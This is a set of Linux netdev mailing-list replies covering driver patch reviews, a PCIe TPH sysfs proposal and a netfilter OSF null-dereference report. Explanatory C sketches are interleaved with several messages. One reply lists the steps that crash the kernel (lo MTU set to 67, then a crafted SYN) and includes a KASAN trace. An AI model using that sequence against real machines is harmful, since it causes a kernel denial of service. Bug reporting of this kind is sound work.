> which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
> because the NAPI was never disabled.
>
> The early return also skips the netdev_tx_reset_subqueue() calls at the end
> of the function.
>
> Should the code either continue with cleanup on timeout (don't return), or
> ensure NAPI and DMA state are properly cleaned up before returning?
ack, I will fix it in v2.
Regards,
Lorenzo
>
> > +
> > + airoha_qdma_stop_napi(qdma);
> > airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> > GLOBAL_CFG_TX_DMA_EN_MASK |
> > GLOBAL_CFG_RX_DMA_EN_MASK);
>
> [ ... ]
>
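The reviewer's first option (continue with cleanup on timeout) can be
modelled in plain C as below. struct fake_qdma, wait_tx_idle() and
fake_dev_stop() are hypothetical stand-ins, not driver code, and this is
only one possible shape for the fix.

```c
#include <errno.h>
#include <stdbool.h>

/* Hypothetical model of the shared QDMA state; not the driver's structs. */
struct fake_qdma {
	int users;		/* open ports sharing this QDMA */
	bool napi_enabled;
	bool dma_enabled;
	int busy_polls;		/* polls for which TX DMA still reports busy */
};

/* Poll until TX DMA is idle or max_polls attempts have been used. */
static int wait_tx_idle(struct fake_qdma *q, int max_polls)
{
	while (max_polls-- > 0) {
		if (q->busy_polls == 0)
			return 0;
		q->busy_polls--;
	}
	return -ETIMEDOUT;
}

static int fake_dev_stop(struct fake_qdma *q)
{
	int err = 0;

	if (--q->users == 0) {
		/* Record the timeout, but do not return early. */
		err = wait_tx_idle(q, 100);

		/*
		 * Teardown runs in every case, so a later open starts
		 * from a consistent state (NAPI disabled, DMA off).
		 */
		q->napi_enabled = false;
		q->dma_enabled = false;
	}
	return err;
}
```

The point is only the control flow: the timeout is reported to the caller,
while NAPI and DMA state are still brought down so that the next open does
not find NAPI already enabled.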
* Re: [RFC] Proposal: Add sysfs interface for PCIe TPH Steering Tag retrieval and configuration
From: Leon Romanovsky @ 2026-04-14 8:57 UTC
To: fengchengwen
Cc: Jason Gunthorpe, Bjorn Helgaas, linux-rdma, linux-pci, netdev,
dri-devel, Keith Busch, Yochai Cohen, Yishai Hadas, Zhiping Zhang
In-Reply-To: <b95ced54-339f-4859-b3eb-8bf261393ffc@huawei.com>
On Tue, Apr 14, 2026 at 09:07:23AM +0800, fengchengwen wrote:
> On 4/14/2026 3:19 AM, Leon Romanovsky wrote:
> > On Mon, Apr 13, 2026 at 08:04:10PM +0800, fengchengwen wrote:
> >> On 4/13/2026 6:01 PM, Leon Romanovsky wrote:
> >>> On Fri, Apr 10, 2026 at 10:30:52PM +0800, fengchengwen wrote:
> >>>> Hi all,
> >>>>
> >>>> I'm writing to propose adding a sysfs interface to expose and configure the
> >>>> PCIe TPH
> >>>> Steering Tag for PCIe devices, which is retrieved inside the kernel.
> >>>>
> >>>>
> >>>> Background: The TPH Steering Tag is tightly coupled with both a PCIe device
> >>>> (identified
> >>>> by its BDF) and a CPU core. It can only be obtained in kernel mode. To allow
> >>>> user-space
> >>>> applications to fetch and set this value securely and conveniently, we need
> >>>> a standard
> >>>> kernel-to-user interface.
> >>>>
> >>>>
> >>>> Proposed Solution: Add several sysfs attributes under each PCIe device's
> >>>> sysfs directory:
> >>>> 1. /sys/bus/pci/devices/<BDF>/tph_mode to query the TPH mode (interrupt or
> >>>> device specific)
> >>>> 2. /sys/bus/pci/devices/<BDF>/tph_enable to control the TPH feature
> >>>> 3. /sys/bus/pci/devices/<BDF>/tph_st to support both read and write
> >>>> operations, e.g.:
> >>>> Read operation:
> >>>> echo "cpu=3" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> cat /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> Write operation:
> >>>> echo "index=10 st=123" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>>
> >>>>
> >>>> The design strictly follows PCI subsystem sysfs standards and has the
> >>>> following key properties:
> >>>>
> >>>> 1. Dynamic Visibility: The sysfs attributes will only be present for PCIe
> >>>> devices that
> >>>> support TPH Steering Tag. Devices without TPH capability will not show
> >>>> these nodes,
> >>>> avoiding unnecessary user confusion.
> >>>>
> >>>> 2. Permission Control: The attributes will use 0600 file permissions,
> >>>> ensuring only
> >>>> privileged root users can read or write them, which satisfies security
> >>>> requirements
> >>>> for hardware configuration interfaces.
> >>>>
> >>>> 3. Standard Implementation Location: The interface will be implemented in
> >>>> drivers/pci/pci-sysfs.c, the canonical location for all PCI device sysfs
> >>>> attributes,
> >>>> ensuring consistency and maintainability within the PCI subsystem.
> >>>>
> >>>>
> >>>> Why sysfs instead of alternatives like VFIO-PCI ioctl:
> >>>>
> >>>> - Universality: sysfs does not require binding the device to a special
> >>>> driver such as
> >>>> vfio-pci. It is available to any privileged user-space component,
> >>>> including system
> >>>> utilities, daemons, and monitoring tools.
> >>>>
> >>>> - Simplicity: Both user-space usage (cat/echo) and kernel implementation are
> >>>> straightforward, reducing code complexity and long-term maintenance cost.
> >>>>
> >>>> - Design Alignment: TPH Steering Tag is a generic PCIe device feature, not
> >>>> specific to
> >>>> user-space drivers like DPDK or VFIO. Exposing it via sysfs matches the
> >>>> kernel's
> >>>> standard pattern for hardware capabilities.
> >>>>
> >>>>
> >>>> I look forward to your comments about this design before submitting the
> >>>> final patch.
> >>>
> >>> You need to explain more clearly why this write functionality is useful
> >>> and necessary outside the VFIO/RDMA context:
> >>> https://lore.kernel.org/all/20260324234615.3731237-1-zhipingz@meta.com/
> >>>
> >>> AFAIK, for non-VFIO TPH callers, kernel has enough knowledge to set
> >>> right ST values.
> >>>
> >>> There are several comments regarding the implementation, but those can wait
> >>> until the rationale behind the proposal is fully clarified.
> >>
> >> Thanks for your review and comments.
> >>
> >> Let me clarify the rationale behind this user-space sysfs interface:
> >>
> >> 1. VFIO is just one of the user-space device access frameworks.
> >> There are many other in-kernel frameworks that expose devices
> >> to user space, such as UIO, UACCE, etc., which may also require
> >> TPH Steering Tag support.
> >>
> >> 2. The kernel can automatically program Steering Tags only when
> >> the device provides a standard ST table in MSI-X or config space.
> >> However, many devices implement vendor-specific or platform-specific
> >> Steering Tag programming methods that cannot be fully handled
> >> by the generic kernel code.
> >>
> >> 3. For such devices, user-space applications or framework drivers
> >> need to retrieve and configure TPH Steering Tags directly.
> >> A unified sysfs interface allows all user-space frameworks
> >> (not just VFIO) to use a common, standard way to manage
> >> TPH Steering Tags, rather than implementing duplicated logic
> >> in each subsystem.
> >>
> >> This interface provides a uniform method for any user-space
> >> device access solution to work with TPH, which is why I believe
> >> it is useful and necessary beyond the VFIO/RDMA case.
> >
> > I understand the rationale for providing a read interface, for example for
> > debugging, but I do not see any justification for a write interface.
>
> Thank you for the comment!
>
> As I explained, the read interface is not only for debugging. It is also needed
> for devices that don't declare an ST location in MSI-X or config space. The following
> is the lspci output for an Intel X710 NIC (TPH part only):
>
> Capabilities: [1a0 v1] Transaction Processing Hints
> Device specific mode supported
> No steering table available
>
> So we cannot configure the ST for the device in the kernel because it is vendor specific.
> But we can configure the ST through its vendor user-space driver; in this case, we
> need to pass the ST from the kernel to user space.
Vendor-specific, in the context of the PCI specification, does not mean the
kernel cannot configure it. It simply means that the ST values are not
stored in the ST table.
Thanks
* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Sebastian Andrzej Siewior @ 2026-04-14 8:55 UTC
To: Marek Vasut
Cc: Jakub Kicinski, netdev, stable, David S. Miller, Andrew Lunn,
Eric Dumazet, Nicolai Buchwitz, Paolo Abeni, Ronald Wahl,
Yicong Hui, linux-kernel, Thomas Gleixner
In-Reply-To: <20260413160336.GQCaw-1d@linutronix.de>
On 2026-04-13 18:03:38 [+0200], To Marek Vasut wrote:
> On 2026-04-13 17:31:34 [+0200], Marek Vasut wrote:
> > > I don't see why it needs to disable interrupts.
> >
> > Because when the lock is held, the PAR code shouldn't be interrupted by an
> > interrupt, otherwise it would completely mess up the state of the KS8851
> > MAC. The spinlock does not protect only the IRQ handler, it protects also
> > ks8851_start_xmit_par() and ks8851_write_mac_addr() and
> > ks8851_read_mac_addr() and ks8851_net_open() and ks8851_net_stop() and other
> > sites which call ks8851_lock()/ks8851_unlock() which cannot be executed
> > concurrently, but where BHs can be enabled.
>
> I need to check this once my brain is at full power again. But which
> interrupt? Your interrupt is threaded. So that should be okay.
I don't understand. There is no point in using spin_lock_irqsave() in
ks8851_lock_par(). You don't protect against interrupts because none of
the users actually runs in interrupt context. As far as I can see, the
interrupt is threaded and the mdio phy link checks should come from the
workqueue.
What is wrong is that the ndo_start_xmit callback can be invoked from a
softirq, and as such you must disable BHs while acquiring a lock which can
be accessed from both contexts. Therefore spin_lock() is not sufficient:
it needs the _bh() variant, and _irq() brings no additional value here.
Sebastian
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:55 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <20260414083703.2531953-1-hxzene@gmail.com>
On Tue, Apr 14, 2026 at 04:37:02PM +0800, Kito Xu (veritas501) wrote:
> From: Kito Xu <hxzene@gmail.com>
>
> Hi Pablo,
>
> On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> > How could skb->dev be NULL !?
>
> skb->dev is NOT NULL. The NULL value is `in_dev` returned by
> __in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
> inetdev_destroy().
A more detailed report helps.
> > This is run from prerouting, input and forward.
>
> Correct. The crash path is in PREROUTING on lo.
>
> > I cannot believe this, I think AI is mocking KASAN splat, if that is
> > the case, I am sorry to say, but it is too bad if you are doing this.
>
> This is a real bug with a reproducible PoC. I understand the KASAN
> output in my original patch email looked suspicious because it was
> interleaved with the PoC's stderr output (the PoC prints debug lines
> while the kernel oops scrolls by simultaneously). That was a formatting
> mistake on my part.
No need for a PoC, a bit more detail is enough.
Thanks for explaining.
^ permalink raw reply
* Re: [PATCH net v7 1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
From: Paolo Abeni @ 2026-04-14 8:53 UTC (permalink / raw)
To: Jiayuan Chen, netdev, Daniel Borkmann
Cc: syzbot+80e046b8da2820b6ba73, Martin KaFai Lau, John Fastabend,
Stanislav Fomichev, Alexei Starovoitov, Andrii Nakryiko,
Eduard Zingerman, Song Liu, Yonghong Song, KP Singh, Hao Luo,
Jiri Olsa, David S. Miller, Eric Dumazet, Jakub Kicinski,
Simon Horman, Jesper Dangaard Brouer, Shuah Khan, Jussi Maki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-2-jiayuan.chen@linux.dev>
On 4/11/26 2:55 AM, Jiayuan Chen wrote:
> syzkaller reported a kernel panic in bond_rr_gen_slave_id() reached via
> xdp_master_redirect(). Full decoded trace:
>
> https://syzkaller.appspot.com/bug?extid=80e046b8da2820b6ba73
>
> bond_rr_gen_slave_id() dereferences bond->rr_tx_counter, a per-CPU
> counter that bonding only allocates in bond_open() when the mode is
> round-robin. If the bond device was never brought up, rr_tx_counter
> stays NULL.
>
> The XDP redirect path can still reach that code on a bond that was
> never opened: bpf_master_redirect_enabled_key is a global static key,
> so as soon as any bond device has native XDP attached, the
> XDP_TX -> xdp_master_redirect() interception is enabled for every
> slave system-wide. The path xdp_master_redirect() ->
> bond_xdp_get_xmit_slave() -> bond_xdp_xmit_roundrobin_slave_get() ->
> bond_rr_gen_slave_id() then runs against a bond that has no
> rr_tx_counter and crashes.
>
> Fix this in the generic xdp_master_redirect() by refusing to call into
> the master's ->ndo_xdp_get_xmit_slave() when the master device is not
> up. IFF_UP is only set after ->ndo_open() has successfully returned,
> so this reliably excludes masters whose XDP state has not been fully
> initialized. Drop the frame with XDP_ABORTED so the exception is
> visible via trace_xdp_exception() rather than silently falling through.
> This is not specific to bonding: any current or future master that
> defers XDP state allocation to ->ndo_open() is protected.
>
> Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
> Reported-by: syzbot+80e046b8da2820b6ba73@syzkaller.appspotmail.com
> Closes: https://lore.kernel.org/all/698f84c6.a70a0220.2c38d7.00cc.GAE@google.com/T/
> Suggested-by: Daniel Borkmann <daniel@iogearbox.net>
> Acked-by: Daniel Borkmann <daniel@iogearbox.net>
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
> net/core/filter.c | 2 ++
> 1 file changed, 2 insertions(+)
>
> diff --git a/net/core/filter.c b/net/core/filter.c
> index cf2113af4bc9..9ec70c4b7723 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -4398,6 +4398,8 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
> struct net_device *master, *slave;
>
> master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
> + if (unlikely(!(master->flags & IFF_UP)))
> + return XDP_ABORTED;
> slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
The AI review noted that the master could (theoretically) be NULL here.
Since that is not a regression (the unconditional `master` dereference
is already present) and syzkaller failed to trigger it (despite this being
the sort of thing syzkaller is very good at finding), I think it's better
to follow up later instead of requesting another revision here, but
please have a look.
Thanks,
Paolo
> if (slave && slave != xdp->rxq->dev) {
> /* The target device is different from the receiving device, so
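For reference, a minimal user-space sketch of what a combined NULL and IFF_UP guard could look like. The types are mock stand-ins for the kernel ones, and `master_usable()` and `redirect_or_abort()` are hypothetical names used only for illustration; this is not the code from the patch or from any follow-up.

```c
#include <stddef.h>

/* Mock stand-ins for kernel definitions; values mirror the UAPI headers. */
#define IFF_UP 0x1
enum xdp_action { XDP_ABORTED = 0, XDP_DROP, XDP_PASS, XDP_TX, XDP_REDIRECT };

struct net_device {
    unsigned int flags;
};

/* Hypothetical helper: non-zero when it is safe to call into the master. */
static int master_usable(const struct net_device *master)
{
    return master != NULL && (master->flags & IFF_UP) != 0;
}

/* Hypothetical wrapper: abort early instead of dereferencing a missing
 * or never-opened master. XDP_TX is only a placeholder for the real
 * slave lookup. */
static enum xdp_action redirect_or_abort(const struct net_device *master)
{
    if (!master_usable(master))
        return XDP_ABORTED;
    return XDP_TX;
}
```

Checking for NULL first keeps the flags test from dereferencing a missing master, which is the theoretical case raised above.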
^ permalink raw reply
* Re: [PATCH iwl-next 1/10] ice: translate FW to SW for max num TCs encoding
From: Simon Horman @ 2026-04-14 8:44 UTC (permalink / raw)
To: Aleksandr Loktionov
Cc: intel-wired-lan, anthony.l.nguyen, netdev, Dave Ertman
In-Reply-To: <20260410074921.1254213-2-aleksandr.loktionov@intel.com>
On Fri, Apr 10, 2026 at 09:49:12AM +0200, Aleksandr Loktionov wrote:
> From: Dave Ertman <david.m.ertman@intel.com>
>
> The FW uses a 3-bit field in a TLV to represent the maximum number of
> Traffic Classes supported per interface. Since the maximum value is 8,
> and at least one TC must be supported, the encoding uses bit values of
> 000 to represent 8 TCs.
>
> The driver currently does not translate this value and reports 0 max TCs
> to the DCBNL interface instead of 8.
>
> Add a translation when interfacing with the FW to use 0x0 as the value
> for 8 max TCs.
>
> Signed-off-by: Dave Ertman <david.m.ertman@intel.com>
> Signed-off-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
I'm not sure if you want to reconsider this as a bug fix.
But the code changes look good to me.
Reviewed-by: Simon Horman <horms@kernel.org>
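As an illustration of the encoding described in the commit message, here is a small user-space sketch of the two translations. The helper names and macros are hypothetical and are not taken from the ice driver; only the 3-bit width and the "0 means 8" rule come from the description above.

```c
#include <stdint.h>

#define MAX_TC_FIELD_MASK 0x7u /* 3-bit field in the TLV */
#define MAX_TC_COUNT      8u   /* largest supported number of TCs */

/* Hypothetical helper: FW encoding -> TC count reported by the driver. */
static uint8_t max_tc_fw_to_sw(uint8_t fw_val)
{
    uint8_t v = fw_val & MAX_TC_FIELD_MASK;

    return v ? v : MAX_TC_COUNT; /* 000b stands for 8 TCs */
}

/* Hypothetical helper: TC count (1..8) -> FW encoding. */
static uint8_t max_tc_sw_to_fw(uint8_t num_tc)
{
    return num_tc & MAX_TC_FIELD_MASK; /* 8 & 0x7 == 0 */
}
```

Because at least one TC must be supported, the value 0 is free to carry the meaning "8", which is what lets eight distinct counts fit in three bits.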
^ permalink raw reply
* RE: [PATCH iwl-net] ice: fix infinite recursion in ice_cfg_tx_topo via ice_init_dev_hw
From: Loktionov, Aleksandr @ 2026-04-14 8:43 UTC (permalink / raw)
To: Oros, Petr, netdev@vger.kernel.org
Cc: Oros, Petr, Nguyen, Anthony L, Kitszel, Przemyslaw, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Nikolay Aleksandrov, Daniel Zahka, Greenwalt, Paul,
Ertman, David M, Michal Swiatkowski, Keller, Jacob E,
intel-wired-lan@lists.osuosl.org, linux-kernel@vger.kernel.org
In-Reply-To: <20260413191420.3524013-1-poros@redhat.com>
> -----Original Message-----
> From: Petr Oros <poros@redhat.com>
> Sent: Monday, April 13, 2026 9:14 PM
> To: netdev@vger.kernel.org
> Cc: Oros, Petr <poros@redhat.com>; Nguyen, Anthony L
> <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw
> <przemyslaw.kitszel@intel.com>; Andrew Lunn <andrew+netdev@lunn.ch>;
> David S. Miller <davem@davemloft.net>; Eric Dumazet
> <edumazet@google.com>; Jakub Kicinski <kuba@kernel.org>; Paolo Abeni
> <pabeni@redhat.com>; Loktionov, Aleksandr
> <aleksandr.loktionov@intel.com>; Nikolay Aleksandrov
> <razor@blackwall.org>; Daniel Zahka <daniel.zahka@gmail.com>;
> Greenwalt, Paul <paul.greenwalt@intel.com>; Ertman, David M
> <david.m.ertman@intel.com>; Michal Swiatkowski
> <michal.swiatkowski@linux.intel.com>; Keller, Jacob E
> <jacob.e.keller@intel.com>; intel-wired-lan@lists.osuosl.org; linux-
> kernel@vger.kernel.org
> Subject: [PATCH iwl-net] ice: fix infinite recursion in
> ice_cfg_tx_topo via ice_init_dev_hw
>
> On certain E810 configurations where firmware supports Tx scheduler
> topology switching (tx_sched_topo_comp_mode_en), ice_cfg_tx_topo() may
> need to apply a new 5-layer or 9-layer topology from the DDP package.
> If the AQ command to set the topology fails (e.g. due to invalid DDP
> data or firmware limitations), the global configuration lock must
> still be cleared via a CORER reset.
>
> Commit 86aae43f21cf ("ice: don't leave device non-functional if Tx
> scheduler config fails") correctly fixed this by refactoring
> ice_cfg_tx_topo() to always trigger CORER after acquiring the global
> lock and re-initialize hardware via ice_init_hw() afterwards.
>
> However, commit 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end
> of deinit paths") later moved ice_init_dev_hw() into ice_init_hw(),
> breaking the reinit path introduced by 86aae43f21cf. This creates an
> infinite recursive call chain:
>
>   ice_init_hw()
>     ice_init_dev_hw()
>       ice_cfg_tx_topo()           # topology change needed
>         ice_deinit_hw()
>         ice_init_hw()             # reinit after CORER
>           ice_init_dev_hw()       # recurse
>             ice_cfg_tx_topo()
>               ...                 # stack overflow
>
> Fix by moving ice_init_dev_hw() back out of ice_init_hw() and calling
> it explicitly from ice_probe() and ice_devlink_reinit_up(). The third
> caller, ice_cfg_tx_topo(), intentionally does not need
> ice_init_dev_hw() during its reinit, it only needs the core HW
> reinitialization. This breaks the recursion cleanly without adding
> flags or guards.
>
> The deinit ordering changes from commit 8a37f9e2ff40 ("ice: move
> ice_deinit_dev() to the end of deinit paths") which fixed slow rmmod
> are preserved, only the init-side placement of ice_init_dev_hw() is
> reverted.
>
> Fixes: 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end of deinit
> paths")
> Signed-off-by: Petr Oros <poros@redhat.com>
> ---
> drivers/net/ethernet/intel/ice/devlink/devlink.c | 2 ++
> drivers/net/ethernet/intel/ice/ice_common.c | 2 --
> drivers/net/ethernet/intel/ice/ice_main.c | 2 ++
> 3 files changed, 4 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> index 6144cee8034d77..641d6e289d5ce6 100644
> --- a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> +++ b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> @@ -1245,6 +1245,8 @@ static int ice_devlink_reinit_up(struct ice_pf
> *pf)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> /* load MSI-X values */
> ice_set_min_max_msix(pf);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_common.c
> b/drivers/net/ethernet/intel/ice/ice_common.c
> index ce11fea122d03e..b617a6bff89134 100644
> --- a/drivers/net/ethernet/intel/ice/ice_common.c
> +++ b/drivers/net/ethernet/intel/ice/ice_common.c
> @@ -1126,8 +1126,6 @@ int ice_init_hw(struct ice_hw *hw)
> if (status)
> goto err_unroll_fltr_mgmt_struct;
>
> - ice_init_dev_hw(hw->back);
> -
> mutex_init(&hw->tnl_lock);
> ice_init_chk_recipe_reuse_support(hw);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_main.c
> b/drivers/net/ethernet/intel/ice/ice_main.c
> index e2a5534819d194..a27be29f9bbbfc 100644
> --- a/drivers/net/ethernet/intel/ice/ice_main.c
> +++ b/drivers/net/ethernet/intel/ice/ice_main.c
> @@ -5314,6 +5314,8 @@ ice_probe(struct pci_dev *pdev, const struct
> pci_device_id __always_unused *ent)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> adapter = ice_adapter_get(pdev);
> if (IS_ERR(adapter)) {
> err = PTR_ERR(adapter);
> --
> 2.52.0
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Kito Xu (veritas501) @ 2026-04-14 8:37 UTC (permalink / raw)
To: pablo
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, hxzene, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <ad35LhIOSaEDJAhS@chamomile>
From: Kito Xu <hxzene@gmail.com>
Hi Pablo,
On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> How could skb->dev be NULL !?
skb->dev is NOT NULL. The NULL value is `in_dev` returned by
__in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
inetdev_destroy().
> This is run from prerouting, input and forward.
Correct. The crash path is in PREROUTING on lo.
> I cannot believe this, I think AI is mocking KASAN splat, if that is
> the case, I am sorry to say, but it is too bad if you are doing this.
This is a real bug with a reproducible PoC. I understand the KASAN
output in my original patch email looked suspicious because it was
interleaved with the PoC's stderr output (the PoC prints debug lines
while the kernel oops scrolls by simultaneously). That was a formatting
mistake on my part.
Let me clarify the root cause and provide a clean KASAN report.
## Root Cause
nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
to in_dev_for_each_ifa_rcu() without a NULL check:
    static inline int nf_osf_ttl(const struct sk_buff *skb,
                                 int ttl_check, unsigned char f_ttl)
    {
        struct in_device *in_dev = __in_dev_get_rcu(skb->dev);
        ...
        /* ttl_check == NF_OSF_TTL_LESS, ip->ttl > f_ttl → falls through */
        in_dev_for_each_ifa_rcu(ifa, in_dev) { /* NULL deref when in_dev == NULL */
            ...
in_dev_for_each_ifa_rcu expands to:
for (ifa = rcu_dereference((in_dev)->ifa_list); ...)
When in_dev is NULL, (NULL)->ifa_list is a NULL dereference at offset
0x10, which matches the KASAN report: null-ptr-deref in range
[0x0000000000000010-0x0000000000000017].
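To make the missing check concrete, here is a user-space sketch of the loop with a NULL guard in front of it. The structs are simplified mocks (only the field names follow the kernel), and `addr_on_local_subnet()` is a hypothetical name; this shows one plausible shape of the guard, not necessarily the exact change in the patch.

```c
#include <stddef.h>
#include <stdint.h>

/* Mock types: field names follow the kernel, layouts are simplified. */
struct in_ifaddr {
    struct in_ifaddr *ifa_next;
    uint32_t ifa_address;
    uint32_t ifa_mask;
};

struct in_device {
    struct in_ifaddr *ifa_list;
};

/* Returns 1 if addr lies on one of in_dev's subnets, 0 otherwise. */
static int addr_on_local_subnet(const struct in_device *in_dev, uint32_t addr)
{
    const struct in_ifaddr *ifa;

    if (!in_dev) /* the guard: no IPv4 state, so nothing can match */
        return 0;

    for (ifa = in_dev->ifa_list; ifa; ifa = ifa->ifa_next)
        if (((addr ^ ifa->ifa_address) & ifa->ifa_mask) == 0)
            return 1;

    return 0;
}
```

Without the guard, the first loop iteration reads `in_dev->ifa_list` through a NULL base pointer, which is the access KASAN flags.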
## How ip_ptr becomes NULL
The loopback driver (loopback.c) does NOT call ether_setup(), so
dev->min_mtu remains 0. This allows setting MTU below IPV4_MIN_MTU
(68). Setting lo MTU to 67 triggers:
    NETDEV_CHANGEMTU event
      → inetdev_valid_mtu(67) == false
        → inetdev_destroy(in_dev)
          → RCU_INIT_POINTER(dev->ip_ptr, NULL)
After this, lo can still receive packets (loopback_xmit → __netif_rx),
but __in_dev_get_rcu(lo) returns NULL.
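The chain above can be modelled in a few lines of user-space C. `struct mock_dev`, `mtu_keeps_ipv4()` and `mock_change_mtu()` are hypothetical stand-ins for the kernel objects and notifier path; only the threshold of 68 and the "ip_ptr becomes NULL" outcome are taken from the description.

```c
#include <stdbool.h>
#include <stddef.h>

#define IPV4_MIN_MTU 68 /* smallest MTU that keeps IPv4 enabled */

/* Mock device: ip_ptr stands in for the per-device IPv4 state. */
struct mock_dev {
    unsigned int mtu;
    void *ip_ptr;
};

/* Mirrors the validity check named above. */
static bool mtu_keeps_ipv4(unsigned int mtu)
{
    return mtu >= IPV4_MIN_MTU;
}

/* Models the MTU-change path: an invalid MTU tears down the IPv4
 * state, which leaves ip_ptr NULL while the device keeps running. */
static void mock_change_mtu(struct mock_dev *dev, unsigned int mtu)
{
    dev->mtu = mtu;
    if (!mtu_keeps_ipv4(mtu))
        dev->ip_ptr = NULL; /* stands in for inetdev_destroy() */
}
```

The point of the model is that the device stays usable for packet I/O after the teardown, so any receive-path code that assumes a non-NULL IPv4 state is exposed.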
## Trigger sequence
1. Load OSF fingerprint (genre=Linux, ttl=64, ttl_check=TTL_LESS)
2. Set up iptables raw PREROUTING rule with xt_osf match
3. Set lo MTU to 67 → inetdev_destroy → ip_ptr = NULL
4. Inject SYN (TTL=255 > f_ttl 64) via AF_PACKET on lo
5. ip_rcv → PREROUTING → xt_osf → nf_osf_ttl() → NULL deref
## Clean KASAN report (from separate capture, no interleaving)
```
[ 2.873592] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN NOPTI
[ 2.878162] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 2.881836] CPU: 0 UID: 0 PID: 169 Comm: poc Not tainted 7.0.0-rc7-next-20260410+ #11 PREEMPTLAZY
[ 2.885160] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 2.889197] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 2.891768] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 2.898548] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 2.900439] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 2.903090] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 2.906785] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 2.909418] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 2.912058] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 2.914978] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 2.917975] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.920236] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 2.922952] Call Trace:
[ 2.923947] <IRQ>
[ 2.924779] nf_osf_match+0x2f8/0x780
[ 2.926183] ? __pfx_nf_osf_match+0x10/0x10
[ 2.928630] ? kvm_sched_clock_read+0x11/0x20
[ 2.930946] ? local_clock+0x15/0x30
[ 2.933963] ? kasan_save_track+0x26/0x60
[ 2.936266] ? __pfx__raw_spin_lock+0x10/0x10
[ 2.938605] xt_osf_match_packet+0x11c/0x1f0
[ 2.940360] ipt_do_table+0x7fe/0x12b0
[ 2.942846] ? __pfx_ipt_do_table+0x10/0x10
[ 2.944267] ? __pfx___smp_call_single_queue+0x10/0x10
[ 2.946109] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10
[ 2.949929] nf_hook_slow+0xac/0x1e0
[ 2.951288] ip_rcv+0x123/0x370
[ 2.952544] ? __pfx_ip_rcv+0x10/0x10
[ 2.954789] ? tryinc_node_nr_active+0xe6/0x160
[ 2.956407] ? __pfx_ip_rcv_finish+0x10/0x10
[ 2.958990] ? __smp_call_single_queue+0x2c7/0x480
[ 2.960907] ? __pfx_ip_rcv+0x10/0x10
[ 2.962315] __netif_receive_skb_one_core+0x166/0x1b0
[ 2.964374] ? __pfx___netif_receive_skb_one_core+0x10/0x10
[ 2.966465] ? _raw_spin_lock_irq+0x8a/0xe0
[ 2.968828] ? update_cfs_rq_load_avg+0x5a/0x560
[ 2.970585] process_backlog+0x197/0x590
[ 2.973489] __napi_poll+0xa1/0x540
[ 2.974887] net_rx_action+0x401/0xd80
[ 2.976358] ? __pfx_net_rx_action+0x10/0x10
